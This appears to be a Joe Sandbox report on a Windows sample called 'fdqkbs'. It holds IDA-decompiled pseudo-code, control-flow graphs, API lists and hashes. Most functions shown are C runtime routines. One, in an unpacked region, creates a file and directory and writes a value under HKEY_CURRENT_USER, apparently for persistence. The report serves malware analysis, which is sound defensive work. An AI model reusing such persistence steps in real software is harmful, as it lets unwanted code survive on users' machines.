                                                                                  control_flow_graph 248 402b6b-402b87 249 402ba3 248->249 250 402b89-402b8d 248->250 252 402ba5-402ba9 249->252 250->249 251 402b8f-402b91 250->251 253 402b93-402b98 call 40370a 251->253 254 402baa-402baf 251->254 265 402b9e call 4036b8 253->265 256 402bb1-402bbb 254->256 257 402bbd-402bc0 254->257 256->257 259 402bde-402bee 256->259 260 402bc2-402bcb call 4031b0 257->260 261 402bce-402bd0 257->261 263 402bf0-402bf6 259->263 264 402bf8 259->264 260->261 261->253 262 402bd2-402bdc 261->262 262->253 262->259 268 402bff-402c01 263->268 264->268 265->249 270 402ce1-402ce4 268->270 271 402c07-402c0e 268->271 270->252 272 402c10-402c15 271->272 273 402c54-402c57 271->273 272->273 276 402c17 272->276 274 402cb5-402cb6 call 404f6e 273->274 275 402c59-402c5d 273->275 282 402cbb-402cbf 274->282 278 402c7e-402c85 275->278 279 402c5f-402c68 275->279 280 402c1d-402c21 276->280 281 402d0f 276->281 285 402c87 278->285 286 402c89-402c8c 278->286 283 402c73-402c78 279->283 284 402c6a-402c71 279->284 287 402c23 280->287 288 402c25-402c28 280->288 289 402d13-402d1c 281->289 282->289 290 402cc1-402cc5 282->290 291 402c7a-402c7c 283->291 284->291 285->286 292 402ce9-402ced 286->292 293 402c8e-402c9a call 40573d call 405647 286->293 287->288 288->292 294 402c2e-402c4f call 405763 288->294 289->252 290->292 295 402cc7-402cd6 290->295 291->286 296 402cff-402d0a call 40370a 292->296 297 402cef-402cfc call 4031b0 292->297 308 402c9f-402ca4 293->308 300 402cd9-402cdb 294->300 295->300 296->265 297->296 300->270 300->271 309 402d21-402d25 308->309 310 402ca6-402ca9 308->310 309->289 310->281 311 402cab-402cb3 310->311 311->300
                                                                                  C-Code - Quality: 97%
                                                                                  			E00402B6B(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                                                                  				signed int _v8;
                                                                                  				char* _v12;
                                                                                  				signed int _v16;
                                                                                  				signed int _v20;
                                                                                  				void* __ebx;
                                                                                  				void* __edi;
                                                                                  				void* __esi;
                                                                                  				void* __ebp;
                                                                                  				signed int _t82;
                                                                                  				char _t89;
                                                                                  				signed int _t96;
                                                                                  				signed int _t98;
                                                                                  				signed int _t101;
                                                                                  				signed int _t104;
                                                                                  				signed int _t108;
                                                                                  				signed int _t109;
                                                                                  				char* _t110;
                                                                                  				signed int _t120;
                                                                                  				signed int _t123;
                                                                                  				signed int _t124;
                                                                                  				signed int _t125;
                                                                                  				signed int _t126;
                                                                                  				void* _t127;
                                                                                  
                                                                                  				_t110 = _a4;
                                                                                  				_t108 = _a8;
                                                                                  				_t123 = _a12;
                                                                                  				_v12 = _t110;
                                                                                  				_v8 = _t108;
                                                                                  				if(_t123 == 0 || _a16 == 0) {
                                                                                  					L5:
                                                                                  					return 0;
                                                                                  				} else {
                                                                                  					_t131 = _t110;
                                                                                  					if(_t110 != 0) {
                                                                                  						_t126 = _a20;
                                                                                  						__eflags = _t126;
                                                                                  						if(_t126 == 0) {
                                                                                  							L9:
                                                                                  							__eflags = _t108 - 0xffffffff;
                                                                                  							if(_t108 != 0xffffffff) {
                                                                                  								_t82 = E004031B0(_t110, 0, _t108);
                                                                                  								_t127 = _t127 + 0xc;
                                                                                  							}
                                                                                  							__eflags = _t126;
                                                                                  							if(__eflags == 0) {
                                                                                  								goto L3;
                                                                                  							} else {
                                                                                  								__eflags = _a16 - (_t82 | 0xffffffff) / _t123;
                                                                                  								if(__eflags > 0) {
                                                                                  									goto L3;
                                                                                  								}
                                                                                  								L13:
                                                                                  								_t124 = _t123 * _a16;
                                                                                  								__eflags =  *(_t126 + 0xc) & 0x0000010c;
                                                                                  								_v20 = _t124;
                                                                                  								_t109 = _t124;
                                                                                  								if(( *(_t126 + 0xc) & 0x0000010c) == 0) {
                                                                                  									_v16 = 0x1000;
                                                                                  								} else {
                                                                                  									_v16 =  *((intOrPtr*)(_t126 + 0x18));
                                                                                  								}
                                                                                  								__eflags = _t124;
                                                                                  								if(_t124 == 0) {
                                                                                  									L40:
                                                                                  									return _a16;
                                                                                  								} else {
                                                                                  									do {
                                                                                  										__eflags =  *(_t126 + 0xc) & 0x0000010c;
                                                                                  										if(( *(_t126 + 0xc) & 0x0000010c) == 0) {
                                                                                  											L24:
                                                                                  											__eflags = _t109 - _v16;
                                                                                  											if(_t109 < _v16) {
                                                                                  												_t89 = E00404F6E(_t109, _t124, _t126); // executed
                                                                                  												__eflags = _t89 - 0xffffffff;
                                                                                  												if(_t89 == 0xffffffff) {
                                                                                  													L45:
                                                                                  													return (_t124 - _t109) / _a12;
                                                                                  												}
                                                                                  												__eflags = _v8;
                                                                                  												if(_v8 == 0) {
                                                                                  													L41:
                                                                                  													__eflags = _a8 - 0xffffffff;
                                                                                  													if(__eflags != 0) {
                                                                                  														E004031B0(_a4, 0, _a8);
                                                                                  													}
                                                                                  													 *((intOrPtr*)(E0040370A(__eflags))) = 0x22;
                                                                                  													L4:
                                                                                  													E004036B8();
                                                                                  													goto L5;
                                                                                  												}
                                                                                  												_v12 = _v12 + 1;
                                                                                  												 *_v12 = _t89;
                                                                                  												_t109 = _t109 - 1;
                                                                                  												_t65 =  &_v8;
                                                                                  												 *_t65 = _v8 - 1;
                                                                                  												__eflags =  *_t65;
                                                                                  												_v16 =  *((intOrPtr*)(_t126 + 0x18));
                                                                                  												goto L39;
                                                                                  											}
                                                                                  											__eflags = _v16;
                                                                                  											if(_v16 == 0) {
                                                                                  												_t96 = 0x7fffffff;
                                                                                  												__eflags = _t109 - 0x7fffffff;
                                                                                  												if(_t109 <= 0x7fffffff) {
                                                                                  													_t96 = _t109;
                                                                                  												}
                                                                                  											} else {
                                                                                  												__eflags = _t109 - 0x7fffffff;
                                                                                  												if(_t109 <= 0x7fffffff) {
                                                                                  													_t50 = _t109 % _v16;
                                                                                  													__eflags = _t50;
                                                                                  													_t120 = _t50;
                                                                                  													_t101 = _t109;
                                                                                  												} else {
                                                                                  													_t120 = 0x7fffffff % _v16;
                                                                                  													_t101 = 0x7fffffff;
                                                                                  												}
                                                                                  												_t96 = _t101 - _t120;
                                                                                  											}
                                                                                  											__eflags = _t96 - _v8;
                                                                                  											if(_t96 > _v8) {
                                                                                  												goto L41;
                                                                                  											} else {
                                                                                  												_push(_t96);
                                                                                  												_push(_v12);
                                                                                  												_push(E0040573D(_t126)); // executed
                                                                                  												_t98 = E00405647(_t109, _t124, _t126, __eflags); // executed
                                                                                  												_t127 = _t127 + 0xc;
                                                                                  												__eflags = _t98;
                                                                                  												if(_t98 == 0) {
                                                                                  													 *(_t126 + 0xc) =  *(_t126 + 0xc) | 0x00000010;
                                                                                  													goto L45;
                                                                                  												}
                                                                                  												__eflags = _t98 - 0xffffffff;
                                                                                  												if(_t98 == 0xffffffff) {
                                                                                  													L44:
                                                                                  													_t72 = _t126 + 0xc;
                                                                                  													 *_t72 =  *(_t126 + 0xc) | 0x00000020;
                                                                                  													__eflags =  *_t72;
                                                                                  													goto L45;
                                                                                  												}
                                                                                  												_v12 = _v12 + _t98;
                                                                                  												_t109 = _t109 - _t98;
                                                                                  												_v8 = _v8 - _t98;
                                                                                  												goto L39;
                                                                                  											}
                                                                                  										}
                                                                                  										_t104 =  *(_t126 + 4);
                                                                                  										__eflags = _t104;
                                                                                  										if(__eflags == 0) {
                                                                                  											goto L24;
                                                                                  										}
                                                                                  										if(__eflags < 0) {
                                                                                  											goto L44;
                                                                                  										}
                                                                                  										_t125 = _t109;
                                                                                  										__eflags = _t109 - _t104;
                                                                                  										if(_t109 >= _t104) {
                                                                                  											_t125 = _t104;
                                                                                  										}
                                                                                  										__eflags = _t125 - _v8;
                                                                                  										if(_t125 > _v8) {
                                                                                  											goto L41;
                                                                                  										} else {
                                                                                  											E00405763(_v12, _v8,  *_t126, _t125);
                                                                                  											 *(_t126 + 4) =  *(_t126 + 4) - _t125;
                                                                                  											 *_t126 =  *_t126 + _t125;
                                                                                  											_v12 = _v12 + _t125;
                                                                                  											_t109 = _t109 - _t125;
                                                                                  											_t127 = _t127 + 0x10;
                                                                                  											_v8 = _v8 - _t125;
                                                                                  											_t124 = _v20;
                                                                                  										}
                                                                                  										L39:
                                                                                  										__eflags = _t109;
                                                                                  									} while (_t109 != 0);
                                                                                  									goto L40;
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  						_t82 = (_t82 | 0xffffffff) / _t123;
                                                                                  						__eflags = _a16 - _t82;
                                                                                  						if(_a16 <= _t82) {
                                                                                  							goto L13;
                                                                                  						}
                                                                                  						goto L9;
                                                                                  					}
                                                                                  					L3:
                                                                                  					 *((intOrPtr*)(E0040370A(_t131))) = 0x16;
                                                                                  					goto L4;
                                                                                  				}
                                                                                  			}


























                                                                                  0x00402b73
                                                                                  0x00402b77
                                                                                  0x00402b7c
                                                                                  0x00402b7f
                                                                                  0x00402b82
                                                                                  0x00402b87
                                                                                  0x00402ba3
                                                                                  0x00000000
                                                                                  0x00402b8f
                                                                                  0x00402b8f
                                                                                  0x00402b91
                                                                                  0x00402baa
                                                                                  0x00402bad
                                                                                  0x00402baf
                                                                                  0x00402bbd
                                                                                  0x00402bbd
                                                                                  0x00402bc0
                                                                                  0x00402bc6
                                                                                  0x00402bcb
                                                                                  0x00402bcb
                                                                                  0x00402bce
                                                                                  0x00402bd0
                                                                                  0x00000000
                                                                                  0x00402bd2
                                                                                  0x00402bd9
                                                                                  0x00402bdc
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00402bde
                                                                                  0x00402bde
                                                                                  0x00402be2
                                                                                  0x00402be9
                                                                                  0x00402bec
                                                                                  0x00402bee
                                                                                  0x00402bf8
                                                                                  0x00402bf0
                                                                                  0x00402bf3
                                                                                  0x00402bf3
                                                                                  0x00402bff
                                                                                  0x00402c01
                                                                                  0x00402ce1
                                                                                  0x00000000
                                                                                  0x00402c07
                                                                                  0x00402c07
                                                                                  0x00402c07
                                                                                  0x00402c0e
                                                                                  0x00402c54
                                                                                  0x00402c54
                                                                                  0x00402c57
                                                                                  0x00402cb6
                                                                                  0x00402cbc
                                                                                  0x00402cbf
                                                                                  0x00402d13
                                                                                  0x00000000
                                                                                  0x00402d19
                                                                                  0x00402cc1
                                                                                  0x00402cc5
                                                                                  0x00402ce9
                                                                                  0x00402ce9
                                                                                  0x00402ced
                                                                                  0x00402cf7
                                                                                  0x00402cfc
                                                                                  0x00402d04
                                                                                  0x00402b9e
                                                                                  0x00402b9e
                                                                                  0x00000000
                                                                                  0x00402b9e
                                                                                  0x00402cca
                                                                                  0x00402ccd
                                                                                  0x00402cd2
                                                                                  0x00402cd3
                                                                                  0x00402cd3
                                                                                  0x00402cd3
                                                                                  0x00402cd6
                                                                                  0x00000000
                                                                                  0x00402cd6
                                                                                  0x00402c59
                                                                                  0x00402c5d
                                                                                  0x00402c7e
                                                                                  0x00402c83
                                                                                  0x00402c85
                                                                                  0x00402c87
                                                                                  0x00402c87
                                                                                  0x00402c5f
                                                                                  0x00402c66
                                                                                  0x00402c68
                                                                                  0x00402c75
                                                                                  0x00402c75
                                                                                  0x00402c75
                                                                                  0x00402c78
                                                                                  0x00402c6a
                                                                                  0x00402c6c
                                                                                  0x00402c6f
                                                                                  0x00402c6f
                                                                                  0x00402c7a
                                                                                  0x00402c7a
                                                                                  0x00402c89
                                                                                  0x00402c8c
                                                                                  0x00000000
                                                                                  0x00402c8e
                                                                                  0x00402c8e
                                                                                  0x00402c8f
                                                                                  0x00402c99
                                                                                  0x00402c9a
                                                                                  0x00402c9f
                                                                                  0x00402ca2
                                                                                  0x00402ca4
                                                                                  0x00402d21
                                                                                  0x00000000
                                                                                  0x00402d21
                                                                                  0x00402ca6
                                                                                  0x00402ca9
                                                                                  0x00402d0f
                                                                                  0x00402d0f
                                                                                  0x00402d0f
                                                                                  0x00402d0f
                                                                                  0x00000000
                                                                                  0x00402d0f
                                                                                  0x00402cab
                                                                                  0x00402cae
                                                                                  0x00402cb0
                                                                                  0x00000000
                                                                                  0x00402cb0
                                                                                  0x00402c8c
                                                                                  0x00402c10
                                                                                  0x00402c13
                                                                                  0x00402c15
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00402c17
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00402c1d
                                                                                  0x00402c1f
                                                                                  0x00402c21
                                                                                  0x00402c23
                                                                                  0x00402c23
                                                                                  0x00402c25
                                                                                  0x00402c28
                                                                                  0x00000000
                                                                                  0x00402c2e
                                                                                  0x00402c37
                                                                                  0x00402c3c
                                                                                  0x00402c3f
                                                                                  0x00402c41
                                                                                  0x00402c44
                                                                                  0x00402c46
                                                                                  0x00402c49
                                                                                  0x00402c4c
                                                                                  0x00402c4c
                                                                                  0x00402cd9
                                                                                  0x00402cd9
                                                                                  0x00402cd9
                                                                                  0x00000000
                                                                                  0x00402c07
                                                                                  0x00402c01
                                                                                  0x00402bd0
                                                                                  0x00402bb6
                                                                                  0x00402bb8
                                                                                  0x00402bbb
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00402bbb
                                                                                  0x00402b93
                                                                                  0x00402b98
                                                                                  0x00000000
                                                                                  0x00402b98

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                                                                                  • String ID:
                                                                                  • API String ID: 4048096073-0
                                                                                  • Opcode ID: 3e55330ef25e11bda9666754cb977c4305d767178d4fee68403ec20e4c83b188
                                                                                  • Instruction ID: abacd86320d5ed1a29450df115b8c4d9fa12e2f409c427afaea6b8449eeccf7a
                                                                                  • Opcode Fuzzy Hash: 3e55330ef25e11bda9666754cb977c4305d767178d4fee68403ec20e4c83b188
                                                                                  • Instruction Fuzzy Hash: AB51F930A00205EBDB249F698A4865FB7B1EF40320F24827BE821772D0D7B9DE41DF59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 352 407055-407064 GetEnvironmentStringsW 353 407066-407069 352->353 354 40706a-40706d 352->354 355 40707f-407087 call 408bfa 354->355 356 40706f-407075 354->356 359 40708c-407091 355->359 356->356 357 407077-40707d 356->357 357->355 357->356 360 4070a0-4070ab call 409de0 359->360 361 407093-40709f FreeEnvironmentStringsW 359->361 360->361
                                                                                  C-Code - Quality: 100%
                                                                                  			E00407055() {
                                                                                  				WCHAR* _t2;
                                                                                  				void* _t4;
                                                                                  				void* _t15;
                                                                                  				WCHAR* _t17;
                                                                                  
                                                                                  				_t2 = GetEnvironmentStringsW();
                                                                                  				_t17 = _t2;
                                                                                  				if(_t17 != 0) {
                                                                                  					if( *_t17 != 0) {
                                                                                  						goto L3;
                                                                                  						do {
                                                                                  							do {
                                                                                  								L3:
                                                                                  								_t2 =  &(_t2[1]);
                                                                                  							} while ( *_t2 != 0);
                                                                                  							_t2 =  &(_t2[1]);
                                                                                  						} while ( *_t2 != 0);
                                                                                  					}
                                                                                  					_t1 = _t2 - _t17 + 2; // -2
                                                                                  					_t10 = _t1;
                                                                                  					_t4 = E00408BFA(_t1); // executed
                                                                                  					_t15 = _t4;
                                                                                  					if(_t15 != 0) {
                                                                                  						E00409DE0(_t15, _t17, _t10);
                                                                                  					}
                                                                                  					FreeEnvironmentStringsW(_t17);
                                                                                  					return _t15;
                                                                                  				} else {
                                                                                  					return 0;
                                                                                  				}
                                                                                  			}







                                                                                  0x00407058
                                                                                  0x0040705e
                                                                                  0x00407064
                                                                                  0x0040706d
                                                                                  0x00000000
                                                                                  0x0040706f
                                                                                  0x0040706f
                                                                                  0x0040706f
                                                                                  0x0040706f
                                                                                  0x00407072
                                                                                  0x00407077
                                                                                  0x0040707a
                                                                                  0x0040706f
                                                                                  0x00407082
                                                                                  0x00407082
                                                                                  0x00407087
                                                                                  0x0040708c
                                                                                  0x00407091
                                                                                  0x004070a3
                                                                                  0x004070a8
                                                                                  0x00407094
                                                                                  0x0040709f
                                                                                  0x00407066
                                                                                  0x00407069
                                                                                  0x00407069

                                                                                  APIs
                                                                                  • GetEnvironmentStringsW.KERNEL32(00000000,00403312), ref: 00407058
                                                                                  • __malloc_crt.LIBCMT ref: 00407087
                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00407094
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                  • String ID:
                                                                                  • API String ID: 237123855-0
                                                                                  • Opcode ID: 35615fc54d2ac24f28e300269086089307abffb33a8936016d094c2736e6faa0
                                                                                  • Instruction ID: a157651967c13172b9dd03f83ae22e2c4aa92d1ff81e8b70bdfe45de40c08460
                                                                                  • Opcode Fuzzy Hash: 35615fc54d2ac24f28e300269086089307abffb33a8936016d094c2736e6faa0
                                                                                  • Instruction Fuzzy Hash: BFF02E77D080116ACB317735BC5589B2728CAD5364306813BF406F3382F938AD81C2AA
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 364 480422-48077a call 48005f call 480073 * 13 399 48077e-480784 364->399 399->399 400 480786-48079c 399->400 402 4807a2-4807b0 400->402 403 4808e4 400->403 402->403 406 4807b6-4807d8 402->406 404 4808e6-4808ec 403->404 406->403 409 4807de-4807f5 406->409 409->403 411 4807fb-480811 409->411 413 480823-480831 call 48037c 411->413 414 480813-48081e 411->414 413->403 418 480837-48084c call 48020a 413->418 414->404 418->403 421 480852-480858 418->421 422 48085e-480879 RegGetValueW 421->422 422->403 423 48087b-480895 RegOpenKeyExW 422->423 423->422 424 480897-4808d7 RegSetValueExW 423->424 424->403 428 4808d9-4808e2 424->428 428->404
                                                                                  APIs
                                                                                    • Part of subcall function 0048037C: PathFileExistsW.KERNELBASE(?), ref: 00480406
                                                                                    • Part of subcall function 0048037C: CreateDirectoryW.KERNELBASE(?,00000000), ref: 00480412
                                                                                    • Part of subcall function 0048020A: PathFileExistsW.KERNELBASE(?), ref: 004802E1
                                                                                    • Part of subcall function 0048020A: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 004802FF
                                                                                  • RegGetValueW.KERNELBASE(80000001,?,?,0000FFFF,00000000,00000000,00000000), ref: 00480875
                                                                                  • RegOpenKeyExW.KERNELBASE(80000001,?,00000000,00020006,?), ref: 00480891
                                                                                  • RegSetValueExW.KERNELBASE(?,?,00000000,00000001,?,00000103), ref: 004808CF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270493693.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_480000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$CreateExistsPathValue$DirectoryOpen
                                                                                  • String ID:
                                                                                  • API String ID: 3065547873-0
                                                                                  • Opcode ID: 0d883c9af3d01ddd46bdeb3ed83b6a0b58d92d35368ae9faeefab95d18a55217
                                                                                  • Instruction ID: 498ffd471fdff6c3de7371ec1af5bb4f55fd9987042214dd8db9f43c787b6c7f
                                                                                  • Opcode Fuzzy Hash: 0d883c9af3d01ddd46bdeb3ed83b6a0b58d92d35368ae9faeefab95d18a55217
                                                                                  • Instruction Fuzzy Hash: E1D14F21E64358A9EB20DBF0DC41FEEB778EF14750F10549BE608EB190E7B54A84CB69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 430 48037c-48040b call 48005f call 480073 * 3 PathFileExistsW 440 48041a-48041f 430->440 441 48040d-480418 CreateDirectoryW 430->441 441->440
                                                                                  APIs
                                                                                  • PathFileExistsW.KERNELBASE(?), ref: 00480406
                                                                                  • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00480412
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270493693.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_480000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateDirectoryExistsFilePath
                                                                                  • String ID:
                                                                                  • API String ID: 2624722123-0
                                                                                  • Opcode ID: 2d927dbdc0c98ac60f85d63aaf64e35996fbb75628e29af14dbdce1127c1c687
                                                                                  • Instruction ID: f7226abc605649c109aacaafde02357ce878df971b12a456388b0a4ab7084ea5
                                                                                  • Opcode Fuzzy Hash: 2d927dbdc0c98ac60f85d63aaf64e35996fbb75628e29af14dbdce1127c1c687
                                                                                  • Instruction Fuzzy Hash: 0611E725A64308B4EB10ABF0EC12FBE6335DF40B10F10991BF904EB2A0E6764A448399
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 442 402d27-402d3b call 405990 445 402d6c 442->445 446 402d3d-402d40 442->446 448 402d6e-402d73 call 4059d5 445->448 446->445 447 402d42-402d45 446->447 449 402d74-402d8f call 4058af call 402b6b 447->449 450 402d47-402d4b 447->450 462 402d94-402da9 call 402dab 449->462 453 402d5c-402d67 call 40370a call 4036b8 450->453 454 402d4d-402d59 call 4031b0 450->454 453->445 454->453 462->448
                                                                                  C-Code - Quality: 88%
                                                                                  			E00402D27(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                  				intOrPtr _t19;
                                                                                  				intOrPtr _t22;
                                                                                  				void* _t33;
                                                                                  
                                                                                  				_push(0xc);
                                                                                  				_push(0x411fd0);
                                                                                  				E00405990(__ebx, __edi, __esi);
                                                                                  				 *((intOrPtr*)(_t33 - 0x1c)) = 0;
                                                                                  				if( *((intOrPtr*)(_t33 + 0x10)) == 0 ||  *((intOrPtr*)(_t33 + 0x14)) == 0) {
                                                                                  					L6:
                                                                                  					_t19 = 0;
                                                                                  				} else {
                                                                                  					if( *((intOrPtr*)(_t33 + 0x18)) != 0) {
                                                                                  						E004058AF( *((intOrPtr*)(_t33 + 0x18)));
                                                                                  						 *((intOrPtr*)(_t33 - 4)) = 0;
                                                                                  						_t22 = E00402B6B( *((intOrPtr*)(_t33 + 8)),  *((intOrPtr*)(_t33 + 0xc)),  *((intOrPtr*)(_t33 + 0x10)),  *((intOrPtr*)(_t33 + 0x14)),  *((intOrPtr*)(_t33 + 0x18))); // executed
                                                                                  						 *((intOrPtr*)(_t33 - 0x1c)) = _t22;
                                                                                  						 *((intOrPtr*)(_t33 - 4)) = 0xfffffffe;
                                                                                  						E00402DAB();
                                                                                  						_t19 =  *((intOrPtr*)(_t33 - 0x1c));
                                                                                  					} else {
                                                                                  						_t41 =  *((intOrPtr*)(_t33 + 0xc)) - 0xffffffff;
                                                                                  						if( *((intOrPtr*)(_t33 + 0xc)) != 0xffffffff) {
                                                                                  							E004031B0( *((intOrPtr*)(_t33 + 8)), 0,  *((intOrPtr*)(_t33 + 0xc)));
                                                                                  						}
                                                                                  						 *((intOrPtr*)(E0040370A(_t41))) = 0x16;
                                                                                  						E004036B8();
                                                                                  						goto L6;
                                                                                  					}
                                                                                  				}
                                                                                  				return E004059D5(_t19);
                                                                                  			}






                                                                                  0x00402d27
                                                                                  0x00402d29
                                                                                  0x00402d2e
                                                                                  0x00402d35
                                                                                  0x00402d3b
                                                                                  0x00402d6c
                                                                                  0x00402d6c
                                                                                  0x00402d42
                                                                                  0x00402d45
                                                                                  0x00402d77
                                                                                  0x00402d7d
                                                                                  0x00402d8f
                                                                                  0x00402d97
                                                                                  0x00402d9a
                                                                                  0x00402da1
                                                                                  0x00402da6
                                                                                  0x00402d47
                                                                                  0x00402d47
                                                                                  0x00402d4b
                                                                                  0x00402d54
                                                                                  0x00402d59
                                                                                  0x00402d61
                                                                                  0x00402d67
                                                                                  0x00000000
                                                                                  0x00402d67
                                                                                  0x00402d45
                                                                                  0x00402d73

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: __lock_file_memset
                                                                                  • String ID:
                                                                                  • API String ID: 26237723-0
                                                                                  • Opcode ID: 33fae8696a22ddc01b4e9403b0cd89f9325ebf0e069a85eabe1f3f523a260358
                                                                                  • Instruction ID: 9e23bb097c87b2cb0c8b28cae3504dfd9644aeb73d234b4e03d6ed55913451c2
                                                                                  • Opcode Fuzzy Hash: 33fae8696a22ddc01b4e9403b0cd89f9325ebf0e069a85eabe1f3f523a260358
                                                                                  • Instruction Fuzzy Hash: 92014071800219EBCF22AFA5C90989F7F30AF04765F10813BF914761E1C3798A62DF95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 86%
                                                                                  			E00402F66(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                  				signed int _t15;
                                                                                  				signed int _t17;
                                                                                  				void* _t26;
                                                                                  				intOrPtr _t28;
                                                                                  
                                                                                  				_push(0xc);
                                                                                  				_push(0x411ff0);
                                                                                  				E00405990(__ebx, __edi, __esi);
                                                                                  				_t28 =  *((intOrPtr*)(_t26 + 8));
                                                                                  				_t29 = _t28 != 0;
                                                                                  				if(_t28 != 0) {
                                                                                  					E004058AF( *((intOrPtr*)(_t26 + 8)));
                                                                                  					_t5 = _t26 - 4;
                                                                                  					 *_t5 =  *(_t26 - 4) & 0x00000000;
                                                                                  					__eflags =  *_t5;
                                                                                  					_t15 = E00402DD2( *((intOrPtr*)(_t26 + 8))); // executed
                                                                                  					 *(_t26 - 0x1c) = _t15;
                                                                                  					 *(_t26 - 4) = 0xfffffffe;
                                                                                  					E00402FC1();
                                                                                  					_t17 =  *(_t26 - 0x1c);
                                                                                  				} else {
                                                                                  					 *((intOrPtr*)(E0040370A(_t29))) = 0x16;
                                                                                  					_t17 = E004036B8() | 0xffffffff;
                                                                                  				}
                                                                                  				return E004059D5(_t17);
                                                                                  			}







                                                                                  0x00402f66
                                                                                  0x00402f68
                                                                                  0x00402f6d
                                                                                  0x00402f74
                                                                                  0x00402f7a
                                                                                  0x00402f7c
                                                                                  0x00402f96
                                                                                  0x00402f9c
                                                                                  0x00402f9c
                                                                                  0x00402f9c
                                                                                  0x00402fa3
                                                                                  0x00402fa9
                                                                                  0x00402fac
                                                                                  0x00402fb3
                                                                                  0x00402fb8
                                                                                  0x00402f7e
                                                                                  0x00402f83
                                                                                  0x00402f8e
                                                                                  0x00402f8e
                                                                                  0x00402fc0

                                                                                  APIs
                                                                                  • __lock_file.LIBCMT ref: 00402F96
                                                                                  • __ftell_nolock.LIBCMT ref: 00402FA3
                                                                                    • Part of subcall function 0040370A: __getptd_noexit.LIBCMT ref: 0040370A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                  • String ID:
                                                                                  • API String ID: 2999321469-0
                                                                                  • Opcode ID: 8f3263e8028bc76e635bdae56e131ecbfbf27d60d2d8a770a885cf73d947d5b9
                                                                                  • Instruction ID: 8b2200138f54d187428e708a17617e132bb05bf2f3e2a31370f94ea22eeb7263
